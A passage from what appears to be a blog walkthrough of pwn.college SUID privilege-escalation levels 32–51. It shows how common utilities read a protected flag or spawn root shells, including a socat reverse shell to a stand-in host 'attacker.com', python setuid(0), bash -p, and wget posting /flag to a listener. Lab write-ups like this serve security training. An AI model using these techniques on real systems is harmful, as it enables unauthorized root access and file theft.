</div><p><code>exec 1&gt;&amp;0</code>：This redirects standard output to standard input, because when a  terminal is opened by default, 0,1 and 2 all point to the same  location, which is the current terminal. So this statement restarts  standard output. At this point, execute the command we can see the output</p>
<p><code>reset</code>：Sets the status of the terminal, we can use it to return the terminal to its original state</p>
<p><code>sh [parameter] command</code></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">-c:command to <span class="nb">read</span> from a string
</span></span><span class="line"><span class="cl">-i:realize interaction scripts
</span></span><span class="line"><span class="cl">-n:do a syntax check
</span></span><span class="line"><span class="cl">-x:implement detailed statement of tracking
</span></span></code></pre></td></tr></table>
</div>
</div><p>level 32: <strong>socat</strong></p>
<ul>
<li>
<p>It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">socat -u <span class="s2">&#34;file:</span><span class="nv">$TheFileToRead_flag</span><span class="s2">&#34;</span> - <span class="c1">#can get the flag</span>
</span></span><span class="line"><span class="cl"><span class="c1">#-u unidirectional mode (left to right)</span>
</span></span></code></pre></td></tr></table>
</div>
</div></li>
<li>
<p>Limited SUID: we can run <strong>socat file:<code>tty</code>,raw,echo=0 tcp-listen:12345</strong> on the attacker box to receive the shell</p>
<p>tty：Teletype, A terminal device consisting of a virtual console, serial port, and pseudo-terminal devices</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl"><span class="nv">RHOST</span><span class="o">=</span>attacker.com
</span></span><span class="line"><span class="cl"><span class="nv">RPORT</span><span class="o">=</span><span class="m">12345</span>
</span></span><span class="line"><span class="cl">socat tcp-connect:<span class="nv">$RHOST</span>:<span class="nv">$RPORT</span> exec:/bin/sh,pty,stderr,setsid,sigint,sane
</span></span><span class="line"><span class="cl"><span class="c1">#I didn&#39;t succed to get the shell(cry...)</span>
</span></span></code></pre></td></tr></table>
</div>
</div></li>
</ul>
<p><strong>require some light programming</strong></p>
<p>level 33: <strong>whiptail</strong>&mdash;&gt;display dialog boxes from shell scripts</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl"><span class="c1">#--textbox &lt;file&gt; &lt;height&gt; &lt;width&gt;</span>
</span></span><span class="line"><span class="cl"><span class="c1">#--scrolltext :force vertical scollbars</span>
</span></span><span class="line"><span class="cl">whiptail --textbox --scrolltext flag <span class="m">20</span> <span class="m">20</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><img src="/img/pwn_college/level33/image-20221107161717570.png"
	
	
	
	loading="lazy"
	
	
></p>
<p>level 34: <strong>awk</strong>&mdash;&gt;pattern scanning and processing language</p>
<p>Use regular, string matching</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">awk <span class="s1">&#39;//&#39;</span> flag <span class="c1">#read the flag</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">awk <span class="s1">&#39;$2 ~ /x/&#39;</span> file
</span></span><span class="line"><span class="cl"><span class="c1"># $2:the 2nd column</span>
</span></span><span class="line"><span class="cl"><span class="c1"># ~:pattern begins</span>
</span></span><span class="line"><span class="cl"><span class="c1"># /x/:pattern match the &#39;x&#39;</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>awk shell</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl"><span class="c1">#xx.awk</span>
</span></span><span class="line"><span class="cl">BEGIN<span class="o">{</span>the statement before execution<span class="o">}</span>
</span></span><span class="line"><span class="cl">END<span class="o">{</span>the statement that should execute after processing all the rows<span class="o">}</span>
</span></span><span class="line"><span class="cl">awk -f xx.awk &lt;file&gt;
</span></span></code></pre></td></tr></table>
</div>
</div><p>level 35: <strong>sed</strong>&ndash;&gt;	stream editor for filtering and transforming text</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl"><span class="c1">#USAGE: sed [OPTION]... {script-only-if-no-other-script} [input-file]...</span>
</span></span><span class="line"><span class="cl">sed -e <span class="s1">&#39;&#39;</span> flag <span class="c1">#read the flag</span>
</span></span><span class="line"><span class="cl"><span class="c1">#-e:--expression=script 	add the script to the commands to be executed</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>level 36: <strong>ed</strong>&mdash;&gt; text editor</p>
<blockquote>
<p>USAGE:	ed [options] [file]</p>
<p>Start edit by reading in &lsquo;file&rsquo; if given. If &lsquo;file&rsquo; begins with a &lsquo;!&rsquo;, read output of shell command.</p>
</blockquote>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">ed flag
</span></span><span class="line"><span class="cl">56	<span class="c1">#output:this is the length of flag</span>
</span></span><span class="line"><span class="cl">,p	<span class="c1">#input</span>
</span></span><span class="line"><span class="cl">the content of flag	<span class="c1">#output</span>
</span></span><span class="line"><span class="cl">q	<span class="c1">#input</span>
</span></span><span class="line"><span class="cl"><span class="nb">exit</span> from this <span class="nb">command</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><code>(.,.)p:</code> Prints the addressed lines. If invoked from a terminal, <strong>ed</strong> pauses at the end of each page until a newline is entered. The current address is set to the last line printed.</p>
<p><code>q:</code> quits ed</p>
<p><strong>doing tricks with permissions</strong></p>
<p>level 37: <strong>chown</strong></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">chown hacker:hacker flag
</span></span><span class="line"><span class="cl">cat flag
</span></span></code></pre></td></tr></table>
</div>
</div><p>level 38: <strong>chmod</strong></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">chmod <span class="m">777</span> flag
</span></span><span class="line"><span class="cl">cat flag
</span></span></code></pre></td></tr></table>
</div>
</div><p>level 39: <strong>cp</strong></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">cp flag /dev/stdout <span class="c1">#can read the flag</span>
</span></span><span class="line"><span class="cl"><span class="c1">#if put the echo of the output to /dev/stdout, it will be sent directly to the standard output(the screen)</span>
</span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;xx&#34;</span> <span class="p">|</span> cp /dev/stdin flag <span class="c1">#this can write the &#39;xx&#39; to the flag</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>level 40: <strong>mv</strong></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">mv /usr/bin/cat /usr/bin/mv <span class="c1"># overwrite the mv, use the mv actually run the cat</span>
</span></span><span class="line"><span class="cl">./babysuid_level40 <span class="c1">#execute the program</span>
</span></span><span class="line"><span class="cl">mv flag <span class="c1">#get the flag</span>
</span></span><span class="line"><span class="cl"><span class="c1">#the normal way to use the &#39;mv&#39; is overwrite the /etc/shadow or /etc/passwd or /etc/sudoers</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><strong>let you program anything</strong></p>
<p>level 41: <strong>perl</strong>&mdash;&gt; extract the language practical statements</p>
<blockquote>
<p>Usage: perl [options] [program file] [para]</p>
</blockquote>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">perl -ne print flag	<span class="c1">#can read the flag</span>
</span></span><span class="line"><span class="cl"><span class="c1">#-n:resume the &#34;while(&lt;&gt;){..}&#34; with the program circulating</span>
</span></span><span class="line"><span class="cl"><span class="c1">#-e:can make the Perl program run in the terminal</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>level 42: <strong>python</strong></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">python -c print<span class="o">(</span>open<span class="o">(</span><span class="s2">&#34;flag&#34;</span><span class="o">)</span>.read<span class="o">())</span> <span class="c1">#can read the flag</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">python
</span></span><span class="line"><span class="cl">&gt;&gt;import os
</span></span><span class="line"><span class="cl">&gt;&gt;os.setuid<span class="o">(</span>0<span class="o">)</span>
</span></span><span class="line"><span class="cl">&gt;&gt;os.system<span class="o">(</span><span class="s2">&#34;/bin/sh&#34;</span><span class="o">)</span>	<span class="c1">#getshell!!</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>level 43: <strong>ruby</strong></p>
<p><strong>Direct use of the command line will have a security warning, so it can only be written script execution file to read the flag.</strong></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">ruby -e <span class="s1">&#39;puts File.read(&#34;flag&#34;)&#39;</span> <span class="c1">#can&#39;t read the flag--&gt;ruby: no -e allowed while running setuid (SecurityError)</span>
</span></span><span class="line"><span class="cl"><span class="c1">#use the scripts</span>
</span></span><span class="line"><span class="cl">touch hack.rb <span class="c1">#it have no permission in the / directory</span>
</span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s1">&#39;puts File.read(&#34;../../flag&#34;)&#39;</span> &gt; hack.rb <span class="c1">#&#39;../../&#39; is the critical!</span>
</span></span><span class="line"><span class="cl">ruby hack.rb <span class="c1">#can read the flag</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>level 44: <strong>bash</strong>&mdash;&gt;(<strong>Bourne Again Shell</strong>) execute the orders read from standard input or files</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">bash -p <span class="c1">#get the shell</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><strong>just straight up weren&rsquo;t designed to let you read files</strong></p>
<p>level 45: <strong>date</strong>&mdash;&gt; Display the current time in the given FORMAT, or set the system date.</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">hacker@babysuid_level45:/$ date -f flag
</span></span><span class="line"><span class="cl">date: invalid date <span class="s1">&#39;pwn.college{the flag}&#39;</span>
</span></span><span class="line"><span class="cl"><span class="c1">#-f, --file=DATEFILE        like --date; once for each line of DATEFILE</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>level 46: <strong>dmesg</strong>&ndash;&gt;(display message): Display boot information / Display or control the kernel ring buffer. The kernel stores boot information in the <strong>ring buffer</strong>. If you do not  have time to view the information on boot, you can use <code>dmesg</code> to do so.  The boot information is also saved in the <code>/var/log</code> directory in a file  called <strong>dmesg</strong></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">dmesg -rF flag <span class="c1">#can read the flag</span>
</span></span><span class="line"><span class="cl"><span class="c1">#-r: --raw	print the raw message buffer</span>
</span></span><span class="line"><span class="cl"><span class="c1">#-F: --file &lt;file&gt;	use the file instead of the kernel log buffer</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>level 47: <strong>wc</strong>(Count words)&mdash;&gt;Print newline, word, and byte counts for each FILE, and a total line if
more than one FILE is specified.</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">wc --files0-from ./flag
</span></span><span class="line"><span class="cl"><span class="c1">#result:wc: &#39;pwn.college{the flag}&#39;$&#39;\n&#39;: No such file or directory</span>
</span></span><span class="line"><span class="cl"><span class="c1">#--files0-from=F    read input from the files specified by</span>
</span></span><span class="line"><span class="cl"><span class="c1">#                   NUL-terminated names in file F;</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>level 48: <strong>gcc</strong>&mdash;&gt;compiler for c &amp; c++</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">hacker@babysuid_level48:/$ gcc -x c -E flag
</span></span><span class="line"><span class="cl"><span class="c1"># 1 &#34;flag&#34;</span>
</span></span><span class="line"><span class="cl"><span class="c1"># 1 &#34;&lt;built-in&gt;&#34;</span>
</span></span><span class="line"><span class="cl"><span class="c1"># 1 &#34;&lt;command-line&gt;&#34;</span>
</span></span><span class="line"><span class="cl"><span class="c1"># 31 &#34;&lt;command-line&gt;&#34;</span>
</span></span><span class="line"><span class="cl"><span class="c1"># 1 &#34;/usr/include/stdc-predef.h&#34; 1 3 4</span>
</span></span><span class="line"><span class="cl"><span class="c1"># 32 &#34;&lt;command-line&gt;&#34; 2</span>
</span></span><span class="line"><span class="cl"><span class="c1"># 1 &#34;flag&#34;</span>
</span></span><span class="line"><span class="cl">pwn.college<span class="o">{</span>the flag<span class="o">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1">#-x: -x &lt;language&gt;	Specify the language of the following input files.</span>
</span></span><span class="line"><span class="cl"><span class="c1">#                   Permissible languages include: c c++ assembler none</span>
</span></span><span class="line"><span class="cl"><span class="c1">#                   &#39;none&#39; means revert to the default behavior of</span>
</span></span><span class="line"><span class="cl"><span class="c1">#                   guessing the language based on the file&#39;s extension.</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1">#-E: Preprocess only; do not compile, assemble or link.</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>level 49: <strong>as</strong>&mdash;&gt;a kind of Compiler set</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span><span class="lnt">7
</span><span class="lnt">8
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">as @flag
</span></span><span class="line"><span class="cl"><span class="c1">#result:Assembler messages:</span>
</span></span><span class="line"><span class="cl"><span class="c1">#		Error: can&#39;t open pwn.college{the flag} for reading: No such file or directory</span>
</span></span><span class="line"><span class="cl"><span class="c1">#@FILE	read options from FILE</span>
</span></span><span class="line"><span class="cl">as -f flag
</span></span><span class="line"><span class="cl"><span class="c1">#result:flag: Assembler messages:</span>
</span></span><span class="line"><span class="cl"><span class="c1">#		flag:1: Error: no such instruction: `pwn.college{flag}&#39;</span>
</span></span><span class="line"><span class="cl"><span class="c1"># -f: skip whitespace and comment preprocessing</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>level 50: <strong>wget</strong>&mdash;&gt; a tool for downloading files from the specified URL</p>
<blockquote>
<p><strong>Usage: wget [OPTION]&hellip; [URL]&hellip;</strong></p>
<p>The file to be read is treated as a list of URLs, one per line, which are actually fetched by <code>wget</code>. The content appears, somewhat modified, as error messages, thus this is not suitable to read arbitrary binary data.</p>
</blockquote>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">hacker@babysuid_level50:/$ wget -i flag
</span></span><span class="line"><span class="cl">--2022-11-10 02:19:47--  http://pwn.college%7flag%7D/
</span></span><span class="line"><span class="cl">Resolving pwn.college<span class="o">{</span>flag<span class="o">}</span> <span class="o">(</span>pwn.college<span class="o">{</span>flag<span class="o">})</span>... failed: Name or service not known.
</span></span><span class="line"><span class="cl">wget: unable to resolve host address <span class="s1">&#39;pwn.college{flag}&#39;</span>
</span></span><span class="line"><span class="cl"><span class="c1">#-i,--input-file=FILE		download URLs found in local or external FILE</span>
</span></span><span class="line"><span class="cl"><span class="c1">#use the -i,error output will forcely convert the content all to lowercase</span>
</span></span></code></pre></td></tr></table>
</div>
</div><div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">nc -lnvp <span class="m">8088</span> <span class="c1">#listeng on the port 8088</span>
</span></span><span class="line"><span class="cl"><span class="c1">#-l : Listen mode, for inbound connects</span>
</span></span><span class="line"><span class="cl"><span class="c1">#*-n: Suppress name/port resolutions. If there&#39;s no -n, error:&#39;nc: getnameinfo: Temporary failure in name resolution&#39;</span>
</span></span><span class="line"><span class="cl"><span class="c1">#-v : Shows the execution of instructions</span>
</span></span><span class="line"><span class="cl"><span class="c1">#-p : port---Specify local port for remote connects</span>
</span></span></code></pre></td></tr></table>
</div>
</div><div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">wget --post-file<span class="o">=</span>/flag http://127.0.0.1:8088 <span class="c1">#another terminal get the flag</span>
</span></span><span class="line"><span class="cl"><span class="c1">#--post-file=FILE	use the POST method; send contents of FILE</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><strong>allowing users to load their own code as plugins into the program is dangerous</strong></p>
<p>level 51: <strong>ssh-keygen</strong>&mdash;&gt;Used to generate an SSH public key for the public and private key file, this level is difficult so I can&rsquo;t understand well about it. Maybe I&rsquo;ll explore that later.</p>
<blockquote>
<p>It loads shared libraries that may be used to run code in the binary execution context.</p>
</blockquote>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">ssh-keygen -D ./lib.so <span class="c1">#but there&#39;s no ./lib.so</span>
</span></span><span class="line"><span class="cl"><span class="c1">#-D pkcs11:Download the public keys provided by the PKCS#11 shared library pkcs11</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><strong>the replay of the video:</strong><a class="link" href="https://www.youtube.com/watch?v=14mIjpOXnrM&amp;t=2878s"  target="_blank" rel="noopener"
    >TheAnswerVideo</a></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">hacker@babysuid_level51:/$ ssh-keygen -D flag
</span></span><span class="line"><span class="cl"><span class="c1">#dlopen flag failed: flag: cannot open shared object file: No such file or directory</span>
</span></span><span class="line"><span class="cl"><span class="c1">#cannot read public key from pkcs11</span>
</span></span></code></pre></td></tr></table>
</div>
</div><div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="c1">//hack.c
</span></span></span><span class="line"><span class="cl"><span class="c1"></span><span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span><span class="kt">char</span> <span class="k">const</span> <span class="o">*</span><span class="n">argv</span><span class="p">[]){</span>
</span></span><span class="line"><span class="cl">    <span class="n">puts</span><span class="p">(</span><span class="s">&#34;hello world&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">my_function</span><span class="p">(){</span>
</span></span><span class="line"><span class="cl">    <span class="n">puts</span><span class="p">(</span><span class="s">&#34;I am here&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="c1">//gcc -shared hack.c  ---&gt;   a.out
</span></span></span><span class="line"><span class="cl"><span class="c1">//./a.out -----&gt;Segmentation fault (core dumped)
</span></span></span><span class="line"><span class="cl"><span class="c1">//file a.out
</span></span></span><span class="line"><span class="cl"><span class="c1">//a.out: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=d2dbe213d9619e8226e1a4c108b9cde1ed002664, not stripped
</span></span></span></code></pre></td></tr></table>
</div>
</div><div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">gcc hack.c
</span></span><span class="line"><span class="cl"><span class="c1">#./a.out ------&gt;hello world</span>
</span></span><span class="line"><span class="cl"><span class="c1">#file a.out</span>
</span></span><span class="line"><span class="cl"><span class="c1">#a.out: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=cbd6236d2d832f1b2673a51f31ad4b2b166f5878, for GNU/Linux 3.2.0, not stripped</span>
</span></span></code></pre></td></tr></table>
</div>
</div><div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">hacker@babysuid_level51:~$ ldd /bin/false
</span></span><span class="line"><span class="cl">        linux-vdso.so.1 <span class="o">(</span>0x00007ffd32359000<span class="o">)</span>
</span></span><span class="line"><span class="cl">        libc.so.6 <span class="o">=</span>&gt; /lib/x86_64-linux-gnu/libc.so.6 <span class="o">(</span>0x00007f9e7fe94000<span class="o">)</span>
</span></span><span class="line"><span class="cl">        /lib64/ld-linux-x86-64.so.2 <span class="o">(</span>0x00007f9e800a7000<span class="o">)</span>
</span></span><span class="line"><span class="cl">hacker@babysuid_level51:~$ file /lib/x86_64-linux-gnu/libc-2.31.so
</span></span><span class="line"><span class="cl">/lib/x86_64-linux-gnu/libc-2.31.so: ELF 64-bit LSB shared object, x86-64, version <span class="m">1</span> <span class="o">(</span>GNU/Linux<span class="o">)</span>, dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID<span class="o">[</span>sha1<span class="o">]=</span>1878e6b475720c7c51969e69ab2d276fae6d1dee, <span class="k">for</span> GNU/Linux 3.2.0, stripped
</span></span></code></pre></td></tr></table>
</div>
</div><div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">hacker@babysuid_level51:~$ ssh-keygen -D a.out
</span></span><span class="line"><span class="cl">dlopen a.out failed: a.out: cannot open shared object file: No such file or directory
</span></span><span class="line"><span class="cl">cannot <span class="nb">read</span> public key from pkcs11
</span></span><span class="line"><span class="cl">hacker@babysuid_level51:~$ ssh-keygen -D ./a.out
</span></span><span class="line"><span class="cl">dlsym<span class="o">(</span>C_GetFunctionList<span class="o">)</span> failed: ./a.out: undefined symbol: C_GetFunctionList
</span></span><span class="line"><span class="cl">cannot <span class="nb">read</span> public key from pkcs11
</span></span></code></pre></td></tr></table>
</div>
</div><div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span><span class="lnt">7
</span><span class="lnt">8
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="c1">//hack.c
</span></span></span><span class="line"><span class="cl"><span class="c1"></span><span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span><span class="kt">char</span> <span class="k">const</span> <span class="o">*</span><span class="n">argv</span><span class="p">[]){</span>
</span></span><span class="line"><span class="cl">    <span class="n">puts</span><span class="p">(</span><span class="s">&#34;hello world&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
